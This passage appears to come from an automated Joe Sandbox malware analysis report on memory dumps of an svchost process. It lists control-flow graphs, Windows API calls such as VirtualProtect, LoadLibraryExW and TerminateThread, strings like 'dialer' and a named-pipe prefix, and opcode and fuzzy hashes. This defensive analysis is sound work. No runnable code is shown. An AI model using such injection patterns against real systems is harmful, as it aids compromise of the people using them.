1fb539cc6a8 676->681 677->578 680->681 681->620
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 338b81fb1fb998c2e9a63077ae0a77f9f53bcbf061a28ddd9ec4cac16e89678f
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 73E1D5B261A74A8AEB20DF25D4C13ED77A2F745B98F0C0125EE8A57BA5CB3CC581C701

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 691 1fb539cf394-1fb539cf3e6 692 1fb539cf4d7 691->692 693 1fb539cf3ec-1fb539cf3ef 691->693 696 1fb539cf4d9-1fb539cf4f5 692->696 694 1fb539cf3f9-1fb539cf3fc 693->694 695 1fb539cf3f1-1fb539cf3f4 693->695 697 1fb539cf402-1fb539cf411 694->697 698 1fb539cf4bc-1fb539cf4cf 694->698 695->696 699 1fb539cf413-1fb539cf416 697->699 700 1fb539cf421-1fb539cf440 LoadLibraryExW 697->700 698->692 701 1fb539cf516-1fb539cf525 GetProcAddress 699->701 702 1fb539cf41c 699->702 703 1fb539cf4f6-1fb539cf50b 700->703 704 1fb539cf446-1fb539cf44f GetLastError 700->704 707 1fb539cf527-1fb539cf54e 701->707 708 1fb539cf4b5 701->708 705 1fb539cf4a8-1fb539cf4af 702->705 703->701 706 1fb539cf50d-1fb539cf510 FreeLibrary 703->706 709 1fb539cf496-1fb539cf4a0 704->709 710 1fb539cf451-1fb539cf468 call 1fb539cc928 704->710 705->697 705->708 706->701 707->696 708->698 709->705 710->709 713 1fb539cf46a-1fb539cf47e call 1fb539cc928 710->713 713->709 716 1fb539cf480-1fb539cf494 LoadLibraryExW 713->716 716->703 716->709
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 4aa6df102775c91470a30eaca5d58870190ca1f5ab6b237e14a952d32f0ac0da
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 2F41F1B231FA4681FA16CB16E8843F52393BB49BA0F4D45399D0B877A4EF3CC4458360

                                                        Control-flow Graph
                                                        • Graph (rendered image not captured): function at 1fb539c104c, basic blocks through 1fb539c11d0; calls RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapAlloc and HeapFree
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: cd5e0a5dff588b072592f6f5fec2fbd5c03b9c3fd72847433edc5f87d93d953f
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 2C416273219B85C6E760CF61E4847AF77A2F389B98F488125DA8A47768DF3CC545CB40

                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD087
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 968b9330f179ee5e314775584756f230334fc7093088daeda48f812371d2e503
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: DD110DB060E28E41FA68A72AD6D23FA63435B847E0F5C4235982B467FADB2C85029710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: caca88eb4ff424c5bfd08270abe60720f522a2b93f121c2b0dd3a671aa919aca
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 60817BF960A64BCEFB50AB69E4D13F96392AB89780F5C44359A07C77B6DB3CC8458700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 76704e09874f35ba00da39aab094292295e922183a9bda5e610428fd81b52da4
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: BA31C0B121BA46A1EE22DB42E880BF56396B758BA0F5D09359D2F0B7A1EF3CC5558300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: f19f250884e5a5ca10a7d28f396b53d68425f9b958b93f700f72ddf209fe23ad
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: F2116072319B8286F7508B56F88536967A1F788FE5F484634EA5B877A4CF7CC8148740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 5c0b12d5fc8e251d62a9ecb423148d3d6f5980d317266ae4fff7775e2e87b1f2
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 8B115E7670AB8682FF549B66F4842B963A2F748B85F4C0439DE8A077A4EF3DC505C704
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 5469abee5b4e9bf0bdf770da9b99d52bae9361e8749dbde8dcbd5f420d2bc2f2
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 17D17D76209B4985EB709B16E4D43AA77A1F3C8B84F580126EACE47BB5DF3CC551CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: cc9ad914701f13315fd69f315d2c8feb691bd09a9d7ccb6b0530ae7b9a7b48cd
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: C131837670AB5A82FA15DF56D5C07BAA792FB44B84F0C44309E8A47B65EF3CC4A18740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 8e2cc52478816b46073d1eda117981dfc24803c2b807f92ef055f03951766850
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: 4A115EB020F28A81FA64A726D6C63BD63435B887F0F5C4734A837467FADF6C84029710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: d96a0d85e18bd00034df92b739627b984554b744396f702b8ef2f930aa75394b
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 67016D71309A8682FB14DB52E4883AA63A2F788BC0F8C4435DE8A43765DF3CC549C700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: fda331bf91d84a1e7dd7c21d20511b9b3e708f0354f79a4ceedf790b70eea54f
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 650121B521A74682FB249B56F8893A563A2BB49B85F4C4834CD4A07774EF3DC1448B00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 170696c3728ef68149a4f5dd5ab44c4829b88e797df50feb444b0b5984898a95
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 4551BFB270A24B8AEB14CB15E489BBA3797F344B88F5D8534DA07477A8EB39C841C704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: a804f7a027a439150108e4f724fee75847e24b7a128904c366b285a41af1a838
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: DD31D1B220A686C6E714DF12E8897AA77A6F344B88F4D8434EE47477A9DB3DC941C704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 7041c7b363bb532df87a82727498a3c47e6c77f4aba70d1cec084aacf5478d1c
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: BCF044B230968692F7608F21F8C47A96762F748BC8FCC4030DA4A46A64DF3CC64DCB04
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 3d718759b31359e7105f5c9c5d76d0a703cea5687920891f1199a65a2e33e12e
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 50F0F8B561ABC682FA148B52F9951A9A762AB48FD0F4C9530EE4B47B28DF2CC4458700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 02050852133c47cbee4d85a20b7f67a6a3ee0c205252fbf7605758d57af0b57c
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 64F062B521A64681FB108F29E4853B96322EB85761F9C0A39CA6B453F4DF3CC444C340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 53032330eb2a6da8034d978688d882b7e120780e33b779c8a0d6604ede2127e4
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: E002CB7221EB8586E760CB56F4947AAB7A1F3C4794F184025EACE87BA9DF7CC454CB00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 35d6f73adecf76b2e3ecaee93454b03218b5995e470e293602ffafe4bc405b43
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: DE61BDB651EB49C6E760CB16E49436AB7A2F388794F581125EA8F47BB8DB7CC540CF00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 5d1ff030d00cd2d713d849fa80cc5a6bdae8e42945106595b2b3d385686a6c18
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: CC1191B2A1EB1311FAA615ECE4D53F911D36B58374F4C9738AD6B06FF68B2CC8415500
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: f9a8c0488bc3d4deea02a29900cc9a1534e547037d25a2bef2725409dacae6a9
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: E8118FF6A1AA9321FA64556AD4D73F612536B783E8E0C0E34A9770E7F6CF2CC8614601
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: f68e625ba7acd24a59fe08d2c251c553b64a170b309e681ffe222c22834a18b8
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 9661A1F360E24242FA698B64D4E03FEA7A3E745742F5D4535CA1B177B4DB3CC8458A60
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: bedfb9b5bf910b629efd52c6bf81bea48cf952128bd26ee9357b23212e3a9e3e
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 27614C7261AB898AE710DF65D4803ED77A2F348B88F084225EF4A17BA9DB3CD555C701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: e67ae822c152f91a8f128c44beafeeb84265359930fac9f4cc8cbbf4076c63b1
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: B8519FB3109282CAEB748B15D4A43AD77A2F359B94F1C5125DA9A87BA5CB3CD460CF02
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: dab5994280bf0e8b86b40aef4342addec26e55d86bcc80a1a6ecae4785b560e1
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 1051C0B212938A8AEB748F15D5C43B977A2F755B94F1C4135DA8A47BE5CB3CC450C702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: c962e0a8b14c83a09ed27bc9a3309a2cbfdf0f654e531ad194cbd062dad2bbc8
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 7851A0B371E2028BEB56CB15D494BE8379AF354B98F588178DA07477A8EB38CC45CB05
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 608a93562e2c18e35ab68ab54ccf2d1a6f83fad5714ed2d3758c5d6ebae4ab62
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 1431BEB321E641D6E712DF11E8947E937AAF740B88F088128EE4B077A8CB3CC940CB05
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 70b94840535153a2c256647204e39846594304de18c1bbc617468f21897222c2
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: D0D105B271AA8189F711CF75D4803EC7BB2F754798F188625CE9A97BA9DB38C406C340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
